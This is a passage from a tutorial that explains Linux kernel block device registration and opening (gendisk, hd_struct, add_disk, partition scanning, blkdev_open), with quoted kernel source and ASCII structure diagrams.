#ifdef CONFIG_BLK_DEV_INTEGRITY
struct blk_integrity *integrity;
#endif
int node_id;
};
</code></pre></div></div>
<p>‘minors’ indicates the maximum number of minor devices; if it is 1, this block device cannot be partitioned.</p>
<p>‘part_tbl’ holds the disk’s partition table info; its ‘part’ field represents the partitions.</p>
<p>‘queue’ holds the I/O requests for this block device.</p>
<p>‘part0’ is the first partition; with no partitions it represents the whole device.</p>
<p>The block device driver has to allocate a gendisk and initialize its fields. A gendisk can represent a partitioned or unpartitioned disk; when the driver calls ‘add_disk’ to add it to the system, the kernel decides whether to scan the partition table.</p>
<h3 id="struct-hd_struct">struct hd_struct</h3>
<p>‘hd_struct’ holds the info of one partition on a block device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct {
sector_t start_sect;
/*
* nr_sects is protected by sequence counter. One might extend a
* partition while IO is happening to it and update of nr_sects
* can be non-atomic on 32bit machines with 64bit sector_t.
*/
sector_t nr_sects;
seqcount_t nr_sects_seq;
sector_t alignment_offset;
unsigned int discard_alignment;
struct device __dev;
struct kobject *holder_dir;
int policy, partno;
struct partition_meta_info *info;
#ifdef CONFIG_FAIL_MAKE_REQUEST
int make_it_fail;
#endif
unsigned long stamp;
atomic_t in_flight[2];
#ifdef CONFIG_SMP
struct disk_stats __percpu *dkstats;
#else
struct disk_stats dkstats;
#endif
atomic_t ref;
struct rcu_head rcu_head;
};
</code></pre></div></div>
<p>‘start_sect’, ‘nr_sects’ and ‘partno’ represent this partition’s start sector, number of sectors and partition number. The ‘__dev’ field means a partition is also treated as a device.</p>
<h3 id="alloc_disk">alloc_disk</h3>
<p>‘alloc_disk’ can be used to allocate a gendisk struct and also do some initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct gendisk *alloc_disk(int minors)
{
return alloc_disk_node(minors, NUMA_NO_NODE);
}
struct gendisk *alloc_disk_node(int minors, int node_id)
{
struct gendisk *disk;
disk = kzalloc_node(sizeof(struct gendisk), GFP_KERNEL, node_id);
if (disk) {
if (!init_part_stats(&disk->part0)) {
kfree(disk);
return NULL;
}
disk->node_id = node_id;
if (disk_expand_part_tbl(disk, 0)) {
free_part_stats(&disk->part0);
kfree(disk);
return NULL;
}
disk->part_tbl->part[0] = &disk->part0;
/*
* set_capacity() and get_capacity() currently don't use
* seqcounter to read/update the part0->nr_sects. Still init
* the counter as we can read the sectors in IO submission
* patch using seqence counters.
*
* TODO: Ideally set_capacity() and get_capacity() should be
* converted to make use of bd_mutex and sequence counters.
*/
seqcount_init(&disk->part0.nr_sects_seq);
hd_ref_init(&disk->part0);
disk->minors = minors;
rand_initialize_disk(disk);
disk_to_dev(disk)->class = &block_class;
disk_to_dev(disk)->type = &disk_type;
device_initialize(disk_to_dev(disk));
}
return disk;
}
int disk_expand_part_tbl(struct gendisk *disk, int partno)
{
struct disk_part_tbl *old_ptbl = disk->part_tbl;
struct disk_part_tbl *new_ptbl;
int len = old_ptbl ? old_ptbl->len : 0;
int target = partno + 1;
size_t size;
int i;
/* disk_max_parts() is zero during initialization, ignore if so */
if (disk_max_parts(disk) && target > disk_max_parts(disk))
return -EINVAL;
if (target <= len)
return 0;
size = sizeof(*new_ptbl) + target * sizeof(new_ptbl->part[0]);
new_ptbl = kzalloc_node(size, GFP_KERNEL, disk->node_id);
if (!new_ptbl)
return -ENOMEM;
new_ptbl->len = target;
for (i = 0; i < len; i++)
rcu_assign_pointer(new_ptbl->part[i], old_ptbl->part[i]);
disk_replace_part_tbl(disk, new_ptbl);
return 0;
}
</code></pre></div></div>
<p>The ‘minors’ argument of ‘alloc_disk’ indicates the maximum number of partitions this disk can have.
The real work is done in ‘alloc_disk_node’. ‘disk_expand_part_tbl’ allocates the gendisk’s part_tbl field and then assigns the gendisk’s part0 to disk->part_tbl->part[0]; part0 is an hd_struct and can also represent the whole disk device. Finally, ‘alloc_disk’ does the routine work that the device driver model requires.</p>
<h3 id="add_disk">add_disk</h3>
<p>After allocating the gendisk and doing some initialization, we need to add it to the system. This is done by the ‘add_disk’ function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void add_disk(struct gendisk *disk)
{
struct backing_dev_info *bdi;
dev_t devt;
int retval;
/* minors == 0 indicates to use ext devt from part0 and should
* be accompanied with EXT_DEVT flag. Make sure all
* parameters make sense.
*/
WARN_ON(disk->minors && !(disk->major || disk->first_minor));
WARN_ON(!disk->minors && !(disk->flags & GENHD_FL_EXT_DEVT));
disk->flags |= GENHD_FL_UP;
retval = blk_alloc_devt(&disk->part0, &devt);
if (retval) {
WARN_ON(1);
return;
}
disk_to_dev(disk)->devt = devt;
/* ->major and ->first_minor aren't supposed to be
* dereferenced from here on, but set them just in case.
*/
disk->major = MAJOR(devt);
disk->first_minor = MINOR(devt);
disk_alloc_events(disk);
/* Register BDI before referencing it from bdev */
bdi = &disk->queue->backing_dev_info;
bdi_register_dev(bdi, disk_devt(disk));
blk_register_region(disk_devt(disk), disk->minors, NULL,
exact_match, exact_lock, disk);
register_disk(disk);
blk_register_queue(disk);
/*
* Take an extra ref on queue which will be put on disk_release()
* so that it sticks around as long as @disk is there.
*/
WARN_ON_ONCE(!blk_get_queue(disk->queue));
retval = sysfs_create_link(&disk_to_dev(disk)->kobj, &bdi->dev->kobj,
"bdi");
WARN_ON(retval);
disk_add_events(disk);
}
</code></pre></div></div>
<p>For block devices, the major number identifies the device driver and the minor number identifies a partition that the driver manages. ‘blk_alloc_devt’ generates the block device’s device number.
‘blk_register_region’ is a very important function: it adds the block device to the system, just like the char device layer does, by inserting the devt into the global variable ‘bdev_map’.
Next is ‘register_disk’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static void register_disk(struct gendisk *disk)
{
struct device *ddev = disk_to_dev(disk);
struct block_device *bdev;
struct disk_part_iter piter;
struct hd_struct *part;
int err;
ddev->parent = disk->driverfs_dev;
dev_set_name(ddev, "%s", disk->disk_name);
/* delay uevents, until we scanned partition table */
dev_set_uevent_suppress(ddev, 1);
if (device_add(ddev))
return;
if (!sysfs_deprecated) {
err = sysfs_create_link(block_depr, &ddev->kobj,
kobject_name(&ddev->kobj));
if (err) {
device_del(ddev);
return;
}
}
/*
* avoid probable deadlock caused by allocating memory with
* GFP_KERNEL in runtime_resume callback of its all ancestor
* devices
*/
pm_runtime_set_memalloc_noio(ddev, true);
disk->part0.holder_dir = kobject_create_and_add("holders", &ddev->kobj);
disk->slave_dir = kobject_create_and_add("slaves", &ddev->kobj);
/* No minors to use for partitions */
if (!disk_part_scan_enabled(disk))
goto exit;
/* No such device (e.g., media were just removed) */
if (!get_capacity(disk))
goto exit;
bdev = bdget_disk(disk, 0);
if (!bdev)
goto exit;
bdev->bd_invalidated = 1;
err = blkdev_get(bdev, FMODE_READ, NULL);
if (err < 0)
goto exit;
blkdev_put(bdev, FMODE_READ);
exit:
/* announce disk after possible partitions are created */
dev_set_uevent_suppress(ddev, 0);
kobject_uevent(&ddev->kobj, KOBJ_ADD);
/* announce possible partitions */
disk_part_iter_init(&piter, disk, 0);
while ((part = disk_part_iter_next(&piter)))
kobject_uevent(&part_to_dev(part)->kobj, KOBJ_ADD);
disk_part_iter_exit(&piter);
}
</code></pre></div></div>
<p>The first part performs the device model operations. The most important is ‘device_add’; after this function there will be a node under /dev, /dev/ramhda for example.
‘disk_part_scan_enabled’ returns false if this disk can’t be partitioned, in which case ‘register_disk’ exits early. If it can, it goes ahead.
‘bdget_disk’ gets a ‘block_device’, which is a very important struct:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct block_device *bdget_disk(struct gendisk *disk, int partno)
{
struct hd_struct *part;
struct block_device *bdev = NULL;
part = disk_get_part(disk, partno);
if (part)
bdev = bdget(part_devt(part));
disk_put_part(part);
return bdev;
}
EXPORT_SYMBOL(bdget_disk);
struct block_device *bdget(dev_t dev)
{
struct block_device *bdev;
struct inode *inode;
inode = iget5_locked(blockdev_superblock, hash(dev),
bdev_test, bdev_set, &dev);
if (!inode)
return NULL;
bdev = &BDEV_I(inode)->bdev;
if (inode->i_state & I_NEW) {
bdev->bd_contains = NULL;
bdev->bd_super = NULL;
bdev->bd_inode = inode;
bdev->bd_block_size = (1 << inode->i_blkbits);
bdev->bd_part_count = 0;
bdev->bd_invalidated = 0;
inode->i_mode = S_IFBLK;
inode->i_rdev = dev;
inode->i_bdev = bdev;
inode->i_data.a_ops = &def_blk_aops;
mapping_set_gfp_mask(&inode->i_data, GFP_USER);
inode->i_data.backing_dev_info = &default_backing_dev_info;
spin_lock(&bdev_lock);
list_add(&bdev->bd_list, &all_bdevs);
spin_unlock(&bdev_lock);
unlock_new_inode(inode);
}
return bdev;
}
struct inode *iget5_locked(struct super_block *sb, unsigned long hashval,
int (*test)(struct inode *, void *),
int (*set)(struct inode *, void *), void *data)
{
struct hlist_head *head = inode_hashtable + hash(sb, hashval);
struct inode *inode;
spin_lock(&inode_hash_lock);
inode = find_inode(sb, head, test, data);
spin_unlock(&inode_hash_lock);
if (inode) {
wait_on_inode(inode);
return inode;
}
inode = alloc_inode(sb);
if (inode) {
struct inode *old;
spin_lock(&inode_hash_lock);
/* We released the lock, so.. */
old = find_inode(sb, head, test, data);
if (!old) {
if (set(inode, data))
goto set_failed;
spin_lock(&inode->i_lock);
inode->i_state = I_NEW;
hlist_add_head(&inode->i_hash, head);
spin_unlock(&inode->i_lock);
inode_sb_list_add(inode);
spin_unlock(&inode_hash_lock);
/* Return the locked inode with I_NEW set, the
* caller is responsible for filling in the contents
*/
return inode;
}
/*
* Uhhuh, somebody else created the same inode under
* us. Use the old inode instead of the one we just
* allocated.
*/
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
inode = old;
wait_on_inode(inode);
}
return inode;
set_failed:
spin_unlock(&inode_hash_lock);
destroy_inode(inode);
return NULL;
}
</code></pre></div></div>
<p>Here ‘iget5_locked’ uses the global variable ‘blockdev_superblock’ as the superblock and will finally call blockdev_superblock-&gt;s_op-&gt;alloc_inode, which is actually ‘bdev_alloc_inode’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static struct inode *bdev_alloc_inode(struct super_block *sb)
{
struct bdev_inode *ei = kmem_cache_alloc(bdev_cachep, GFP_KERNEL);
if (!ei)
return NULL;
return &ei->vfs_inode;
}
struct bdev_inode {
struct block_device bdev;
struct inode vfs_inode;
};
</code></pre></div></div>
<p>From this we know that ‘iget5_locked’ returns an inode embedded in a ‘bdev_inode’ struct, and from this inode we can get the ‘block_device’ field ‘bdev’.
In ‘iget5_locked’, it calls ‘bdev_set’, which sets ‘bdev.bd_dev’ to the disk’s device number.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int bdev_set(struct inode *inode, void *data)
{
BDEV_I(inode)->bdev.bd_dev = *(dev_t *)data;
return 0;
}
</code></pre></div></div>
<p>After getting the ‘block_device’, ‘register_disk’ sets ‘bdev-&gt;bd_invalidated’ to 1; this gives the kernel a chance to scan this disk again.
Next it calls ‘blkdev_get’, which in turn calls ‘__blkdev_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blkdev_get(struct block_device *bdev, fmode_t mode, void *holder)
{
struct block_device *whole = NULL;
int res;
WARN_ON_ONCE((mode & FMODE_EXCL) && !holder);
if ((mode & FMODE_EXCL) && holder) {
whole = bd_start_claiming(bdev, holder);
if (IS_ERR(whole)) {
bdput(bdev);
return PTR_ERR(whole);
}
}
res = __blkdev_get(bdev, mode, 0);
if (whole) {
struct gendisk *disk = whole->bd_disk;
/* finish claiming */
mutex_lock(&bdev->bd_mutex);
spin_lock(&bdev_lock);
if (!res) {
BUG_ON(!bd_may_claim(bdev, whole, holder));
/*
* Note that for a whole device bd_holders
* will be incremented twice, and bd_holder
* will be set to bd_may_claim before being
* set to holder
*/
whole->bd_holders++;
whole->bd_holder = bd_may_claim;
bdev->bd_holders++;
bdev->bd_holder = holder;
}
/* tell others that we're done */
BUG_ON(whole->bd_claiming != holder);
whole->bd_claiming = NULL;
wake_up_bit(&whole->bd_claiming, 0);
spin_unlock(&bdev_lock);
/*
* Block event polling for write claims if requested. Any
* write holder makes the write_holder state stick until
* all are released. This is good enough and tracking
* individual writeable reference is too fragile given the
* way @mode is used in blkdev_get/put().
*/
if (!res && (mode & FMODE_WRITE) && !bdev->bd_write_holder &&
(disk->flags & GENHD_FL_BLOCK_EVENTS_ON_EXCL_WRITE)) {
bdev->bd_write_holder = true;
disk_block_events(disk);
}
mutex_unlock(&bdev->bd_mutex);
bdput(whole);
}
return res;
}
</code></pre></div></div>
<p>‘__blkdev_get’ is very long. Here we will go down the first path, where it first calls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int __blkdev_get(struct block_device *bdev, fmode_t mode, int for_part)
{
struct gendisk *disk;
struct module *owner;
int ret;
int partno;
int perm = 0;
...
ret = -ENXIO;
disk = get_gendisk(bdev->bd_dev, &partno);
if (!disk)
goto out;
owner = disk->fops->owner;
disk_block_events(disk);
mutex_lock_nested(&bdev->bd_mutex, for_part);
if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
if (!partno) {
struct backing_dev_info *bdi;
ret = -ENXIO;
bdev->bd_part = disk_get_part(disk, partno);
if (!bdev->bd_part)
goto out_clear;
ret = 0;
if (disk->fops->open) {
ret = disk->fops->open(bdev, mode);
if (ret == -ERESTARTSYS) {
/* Lost a race with 'disk' being
* deleted, try again.
* See md.c
*/
disk_put_part(bdev->bd_part);
bdev->bd_part = NULL;
bdev->bd_disk = NULL;
bdev->bd_queue = NULL;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
goto restart;
}
}
if (!ret) {
bd_set_size(bdev,(loff_t)get_capacity(disk)<<9);
bdi = blk_get_backing_dev_info(bdev);
if (bdi == NULL)
bdi = &default_backing_dev_info;
bdev_inode_switch_bdi(bdev->bd_inode, bdi);
}
/*
* If the device is invalidated, rescan partition
* if open succeeded or failed with -ENOMEDIUM.
* The latter is necessary to prevent ghost
* partitions on a removed medium.
*/
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(disk, bdev);
}
if (ret)
goto out_clear;
}
...
bdev->bd_openers++;
if (for_part)
bdev->bd_part_count++;
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
return 0;
out_clear:
disk_put_part(bdev->bd_part);
bdev->bd_disk = NULL;
bdev->bd_part = NULL;
bdev->bd_queue = NULL;
bdev_inode_switch_bdi(bdev->bd_inode, &default_backing_dev_info);
if (bdev != bdev->bd_contains)
__blkdev_put(bdev->bd_contains, mode, 1);
bdev->bd_contains = NULL;
out_unlock_bdev:
mutex_unlock(&bdev->bd_mutex);
disk_unblock_events(disk);
put_disk(disk);
module_put(owner);
out:
bdput(bdev);
return ret;
}
</code></pre></div></div>
<p>First it gets the gendisk; here we see how the device number bdev-&gt;bd_dev is used.
Then it sets some fields of bdev, and ‘bdev-&gt;bd_part’ points to ‘disk-&gt;part0’.
Then it calls ‘disk-&gt;fops-&gt;open(bdev, mode);’.
The next important function is ‘rescan_partitions’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int rescan_partitions(struct gendisk *disk, struct block_device *bdev)
{
struct parsed_partitions *state = NULL;
struct hd_struct *part;
int p, highest, res;
rescan:
if (state && !IS_ERR(state)) {
free_partitions(state);
state = NULL;
}
res = drop_partitions(disk, bdev);
if (res)
return res;
if (disk->fops->revalidate_disk)
disk->fops->revalidate_disk(disk);
check_disk_size_change(disk, bdev);
bdev->bd_invalidated = 0;
if (!get_capacity(disk) || !(state = check_partition(disk, bdev)))
return 0;
if (IS_ERR(state)) {
/*
* I/O error reading the partition table. If any
* partition code tried to read beyond EOD, retry
* after unlocking native capacity.
*/
if (PTR_ERR(state) == -ENOSPC) {
printk(KERN_WARNING "%s: partition table beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
return -EIO;
}
/*
* If any partition code tried to read beyond EOD, try
* unlocking native capacity even if partition table is
* successfully read as we could be missing some partitions.
*/
if (state->access_beyond_eod) {
printk(KERN_WARNING
"%s: partition table partially beyond EOD, ",
disk->disk_name);
if (disk_unlock_native_capacity(disk))
goto rescan;
}
/* tell userspace that the media / partition table may have changed */
kobject_uevent(&disk_to_dev(disk)->kobj, KOBJ_CHANGE);
/* Detect the highest partition number and preallocate
* disk->part_tbl. This is an optimization and not strictly
* necessary.
*/
for (p = 1, highest = 0; p < state->limit; p++)
if (state->parts[p].size)
highest = p;
disk_expand_part_tbl(disk, highest);
/* add partitions */
for (p = 1; p < state->limit; p++) {
sector_t size, from;
struct partition_meta_info *info = NULL;
size = state->parts[p].size;
if (!size)
continue;
from = state->parts[p].from;
if (from >= get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d start %llu is beyond EOD, ",
disk->disk_name, p, (unsigned long long) from);
if (disk_unlock_native_capacity(disk))
goto rescan;
continue;
}
if (from + size > get_capacity(disk)) {
printk(KERN_WARNING
"%s: p%d size %llu extends beyond EOD, ",
disk->disk_name, p, (unsigned long long) size);
if (disk_unlock_native_capacity(disk)) {
/* free state and restart */
goto rescan;
} else {
/*
* we can not ignore partitions of broken tables
* created by for example camera firmware, but
* we limit them to the end of the disk to avoid
* creating invalid block devices
*/
size = get_capacity(disk) - from;
}
}
if (state->parts[p].has_info)
info = &state->parts[p].info;
part = add_partition(disk, p, from, size,
state->parts[p].flags,
&state->parts[p].info);
if (IS_ERR(part)) {
printk(KERN_ERR " %s: p%d could not be added: %ld\n",
disk->disk_name, p, -PTR_ERR(part));
continue;
}
#ifdef CONFIG_BLK_DEV_MD
if (state->parts[p].flags & ADDPART_FLAG_RAID)
md_autodetect_dev(part_to_dev(part)->devt);
#endif
}
free_partitions(state);
return 0;
}
</code></pre></div></div>
<p>It calls ‘check_partition’. Every partition recognition function is in the global variable ‘check_part’; if there is no partition table on the disk, it will print ‘unknown partition table’.
What if there are partitions on this disk? It will call ‘disk_expand_part_tbl’ to expand ‘gendisk-&gt;part_tbl’, then call ‘add_partition’ to add each partition device to the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct hd_struct *add_partition(struct gendisk *disk, int partno,
sector_t start, sector_t len, int flags,
struct partition_meta_info *info)
{
struct hd_struct *p;
dev_t devt = MKDEV(0, 0);
struct device *ddev = disk_to_dev(disk);
struct device *pdev;
struct disk_part_tbl *ptbl;
const char *dname;
int err;
err = disk_expand_part_tbl(disk, partno);
if (err)
return ERR_PTR(err);
ptbl = disk->part_tbl;
if (ptbl->part[partno])
return ERR_PTR(-EBUSY);
p = kzalloc(sizeof(*p), GFP_KERNEL);
if (!p)
return ERR_PTR(-EBUSY);
if (!init_part_stats(p)) {
err = -ENOMEM;
goto out_free;
}
seqcount_init(&p->nr_sects_seq);
pdev = part_to_dev(p);
p->start_sect = start;
p->alignment_offset =
queue_limit_alignment_offset(&disk->queue->limits, start);
p->discard_alignment =
queue_limit_discard_alignment(&disk->queue->limits, start);
p->nr_sects = len;
p->partno = partno;
p->policy = get_disk_ro(disk);
if (info) {
struct partition_meta_info *pinfo = alloc_part_info(disk);
if (!pinfo)
goto out_free_stats;
memcpy(pinfo, info, sizeof(*info));
p->info = pinfo;
}
dname = dev_name(ddev);
if (isdigit(dname[strlen(dname) - 1]))
dev_set_name(pdev, "%sp%d", dname, partno);
else
dev_set_name(pdev, "%s%d", dname, partno);
device_initialize(pdev);
pdev->class = &block_class;
pdev->type = &part_type;
pdev->parent = ddev;
err = blk_alloc_devt(p, &devt);
if (err)
goto out_free_info;
pdev->devt = devt;
/* delay uevent until 'holders' subdir is created */
dev_set_uevent_suppress(pdev, 1);
err = device_add(pdev);
if (err)
goto out_put;
err = -ENOMEM;
p->holder_dir = kobject_create_and_add("holders", &pdev->kobj);
if (!p->holder_dir)
goto out_del;
dev_set_uevent_suppress(pdev, 0);
if (flags & ADDPART_FLAG_WHOLEDISK) {
err = device_create_file(pdev, &dev_attr_whole_disk);
if (err)
goto out_del;
}
/* everything is up and running, commence */
rcu_assign_pointer(ptbl->part[partno], p);
/* suppress uevent if the disk suppresses it */
if (!dev_get_uevent_suppress(ddev))
kobject_uevent(&pdev->kobj, KOBJ_ADD);
hd_ref_init(p);
return p;
out_free_info:
free_part_info(p);
out_free_stats:
free_part_stats(p);
out_free:
kfree(p);
return ERR_PTR(err);
out_del:
kobject_put(p->holder_dir);
device_del(pdev);
out_put:
put_device(pdev);
blk_free_devt(devt);
return ERR_PTR(err);
}
</code></pre></div></div>
<p>First it allocates a ‘hd_struct’ to hold this partition’s information. The kernel treats every partition as a separate device, so every ‘add_partition’ calls ‘device_add’ to add the partition to the system and create a node in /dev, such as /dev/ramhda1 or /dev/ramhda2. Notice there is no ‘block_device’ for a partition yet.</p>
<p>After calling ‘register_disk’, ‘add_disk’ calls ‘blk_register_queue’. This function initializes the disk’s request queue.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int blk_register_queue(struct gendisk *disk)
{
int ret;
struct device *dev = disk_to_dev(disk);
struct request_queue *q = disk->queue;
if (WARN_ON(!q))
return -ENXIO;
/*
* Initialization must be complete by now. Finish the initial
* bypass from queue allocation.
*/
blk_queue_bypass_end(q);
queue_flag_set_unlocked(QUEUE_FLAG_INIT_DONE, q);
ret = blk_trace_init_sysfs(dev);
if (ret)
return ret;
ret = kobject_add(&q->kobj, kobject_get(&dev->kobj), "%s", "queue");
if (ret < 0) {
blk_trace_remove_sysfs(dev);
return ret;
}
kobject_uevent(&q->kobj, KOBJ_ADD);
if (q->mq_ops)
blk_mq_register_disk(disk);
if (!q->request_fn)
return 0;
ret = elv_register_queue(q);
if (ret) {
kobject_uevent(&q->kobj, KOBJ_REMOVE);
kobject_del(&q->kobj);
blk_trace_remove_sysfs(dev);
kobject_put(&dev->kobj);
return ret;
}
return 0;
}
</code></pre></div></div>
<p>Though this queue is what will carry the device’s requests, all we see at this point is its initialization doing standard device model work.</p>
<p>So ‘add_disk’ has added the disk to the system, and the following structures have been created.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_device
+---------------+ <--+
+--------------------------------------+ bd_part | |
| +---------------+ |
| +-------------------------+ bd_disk | |
| | +---------------+ |
| | | bd_contains +----+
| | +---------------+
| | |bd_invalidated=0
| | +---------------+
| | |bd_openers=1 |
| | +---------------+
| |
| |
| |
| |
| v
| gendisk
| +-------------------+
| | |
| +-------------------+ disk_part_tbl
| | *part_tbl +------------> +---------------+
| +-------------------+ | |
| | | +---------------+
| | | | len |
| | | +---------------+
| | | | |
| | | +---------------+
+---------> +-------------------+ <------------+ *part[0] |
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __dev | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="open-block-device">open block device</h3>
<p>When we add a device to the system, a node in /dev will be created; this is done in ‘devtmpfs_create_node’. The node is created by devtmpfs, and when its inode is created, ‘init_special_inode’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>So the inode’s ‘i_fop’ will be ‘def_blk_fops’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const struct file_operations def_blk_fops = {
.open = blkdev_open,
.release = blkdev_close,
.llseek = block_llseek,
.read = do_sync_read,
.write = do_sync_write,
.aio_read = blkdev_aio_read,
.aio_write = blkdev_aio_write,
.mmap = generic_file_mmap,
.fsync = blkdev_fsync,
.unlocked_ioctl = block_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_blkdev_ioctl,
#endif
.splice_read = generic_file_splice_read,
.splice_write = generic_file_splice_write,
};
</code></pre></div></div>
<p>When a block device such as /dev/ramhda is opened, ‘blkdev_open’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int blkdev_open(struct inode * inode, struct file * filp)
{
struct block_device *bdev;
/*
* Preserve backwards compatibility and allow large file access
* even if userspace doesn't ask for it explicitly. Some mkfs
* binary needs it. We might want to drop this workaround
* during an unstable branch.
*/
filp->f_flags |= O_LARGEFILE;
if (filp->f_flags & O_NDELAY)
filp->f_mode |= FMODE_NDELAY;
if (filp->f_flags & O_EXCL)
filp->f_mode |= FMODE_EXCL;
if ((filp->f_flags & O_ACCMODE) == 3)
filp->f_mode |= FMODE_WRITE_IOCTL;
bdev = bd_acquire(inode);
if (bdev == NULL)
return -ENOMEM;
filp->f_mapping = bdev->bd_inode->i_mapping;
return blkdev_get(bdev, filp->f_mode, filp);
}
</code></pre></div></div>
<p>This function does two things: it gets the ‘block_device’ bdev using ‘bd_acquire’ and then calls ‘blkdev_get’.
‘bd_acquire’ returns an existing ‘block_device’ if we open the whole disk; otherwise it creates a new ‘block_device’. Either way, ‘bd_acquire’ returns a ‘block_device’.
The next function is ‘blkdev_get’, which was discussed before. It calls ‘__blkdev_get’, but this time we will follow a different path, using the opening of a disk partition as an example; here partno is 1.
First, get the gendisk in ‘__blkdev_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (!bdev->bd_openers) {
bdev->bd_disk = disk;
bdev->bd_queue = disk->queue;
bdev->bd_contains = bdev;
...
struct block_device *whole;
whole = bdget_disk(disk, 0);
ret = -ENOMEM;
if (!whole)
goto out_clear;
BUG_ON(for_part);
ret = __blkdev_get(whole, mode, 1);
if (ret)
goto out_clear;
bdev->bd_contains = whole;
bdev_inode_switch_bdi(bdev->bd_inode,
whole->bd_inode->i_data.backing_dev_info);
bdev->bd_part = disk_get_part(disk, partno);
if (!(disk->flags & GENHD_FL_UP) ||
!bdev->bd_part || !bdev->bd_part->nr_sects) {
ret = -ENXIO;
goto out_clear;
}
bd_set_size(bdev, (loff_t)bdev->bd_part->nr_sects << 9);
}
</code></pre></div></div>
<p>Then it gets the gendisk’s block_device and assigns it to ‘whole’, which is later assigned to ‘bdev-&gt;bd_contains’.
Then it calls ‘__blkdev_get(whole, mode, 1);’, which goes here:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
if (bdev->bd_contains == bdev) {
ret = 0;
if (bdev->bd_disk->fops->open)
ret = bdev->bd_disk->fops->open(bdev, mode);
/* the same as first opener case, read comment there */
if (bdev->bd_invalidated) {
if (!ret)
rescan_partitions(bdev->bd_disk, bdev);
else if (ret == -ENOMEDIUM)
invalidate_partitions(bdev->bd_disk, bdev);
}
if (ret)
goto out_unlock_bdev;
}
</code></pre></div></div>
<p>This mostly calls ‘bd_disk-&gt;fops-&gt;open’.
So here we can see that every disk has a ‘block_device’, created when ‘add_disk’ is called. For a partition, the kernel doesn’t create a ‘block_device’ when it detects the partition and inserts it into the system; the ‘block_device’ is created when the partition is opened.
The following picture shows the partition’s ‘block_device’ and the gendisk’s ‘block_device’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> block_device
+---------------+ <--+ <-----------------------------------+
+--------------------------------------+ bd_part | | |
| +---------------+ | |
| +-------------------------+ bd_disk | | |
| | +---------------+ | |
| | | bd_contains +----+ |
| | +---------------+ |
| | |bd_invalidated=0 |
| | +---------------+ |
| | |bd_openers=1 | block_device |
| | +---------------+ +---------------+ |
| | +----+ bd_part | |
| | | +---------------+ |
| | +---------------------------------------+ bd_disk | |
| | | | +---------------+ |
| v v | | bd_contains +--------+
| gendisk | +---------------+
| +-------------------+ | |bd_invalidated=
| | | | +---------------+
| +-------------------+ disk_part_tbl | |bd_openers=1 |
| | *part_tbl +------------> +---------------+ | +---------------+
| +-------------------+ | | |
| | | +---------------+ |
| | | | len | |
| | | +---------------+ |
| | | | | +-------+
| | | +---------------+ |
+---------> +-------------------+ <------------+ *part[0] | v
part0 | start_sect | +---------------+ hd_struct
+-------------------+ | *part[1] +----------> +---------------+
| nr_sects | +---------------+ | start_sect |
+-------------------+ +---------------+
| __dev | | nr_sects |
+-------------------+ +---------------+
| partno=0 | | partno=1 |
+-------------------+ +---------------+
| | | |
| | +---------------+
| |
| |
+-------------------+
</code></pre></div></div>
<h3 id="blk_init_queue">blk_init_queue</h3>
<p>A block device needs a queue to hold the data requests coming from the file system, and also a function to handle every request in the queue. There are two methods to handle this, called ‘request’ and ‘make request’. We first discuss the ‘request’ method.
When using ‘request’, the block device driver has to allocate a request queue by calling ‘blk_init_queue’. The driver needs to implement a request handler function and pass it to ‘blk_init_queue’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct request_queue *blk_init_queue(request_fn_proc *rfn, spinlock_t *lock)
{
